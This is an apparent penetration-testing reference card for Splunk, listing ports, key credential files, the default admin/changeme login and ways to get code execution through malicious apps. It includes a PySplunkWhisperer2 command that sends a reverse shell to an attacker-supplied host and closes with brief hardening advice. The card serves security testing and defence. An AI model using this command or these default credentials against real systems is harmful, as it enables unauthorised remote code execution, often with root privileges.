Splunk
aka Splunk Enterprise, Universal Forwarder
Log/analytics platform. Splunk runs apps, so a malicious app with a scripted input is reliable RCE, often as root/SYSTEM, and the default admin:changeme is everywhere.
Ports
| Port | Proto | Notes |
|---|---|---|
8000 | tcp | Splunk web UI |
8089 | tcp | management / REST API (forwarder agent) |
9997 | tcp | forwarder receiving |
Fingerprint
- Login at :8000/en-US/account/login
- Management API on :8089 (often exposed on forwarders without a UI)
Key files
| Path | Holds | Sensitive |
|---|---|---|
$SPLUNK_HOME/etc/passwd | Splunk user password hashes | sensitive |
$SPLUNK_HOME/etc/system/local/authentication.conf | auth backend config | sensitive |
Default / weak creds
admin / changeme (classic default)
Service users
splunk (commonly root or SYSTEM)
Exploitation primitives
- Deploy a custom app containing a scripted/modular input that runs your script: RCE as the Splunk service account
- Push the app to forwarders via the deployment server for mass code exec
- SplunkWhisperer2 automates the forwarder-agent (8089) attack
Overview
Splunk is built to run code (search scripts, app inputs), which makes admin access or an exposed forwarder agent a straightforward shell, frequently with high privilege.
RCE via a malicious app
# package an app with bin/rev.py + inputs.conf (scripted input), then upload via
# Manage Apps -> Install app from file, or against the forwarder agent:
python PySplunkWhisperer2_remote.py --host <TARGET> --lhost <YOUR_IP> \
--username admin --password changeme --payload "reverse shell" --lport 4444Hardening
Change the default admin password, restrict who can install apps, and run Splunk as a low-privileged account.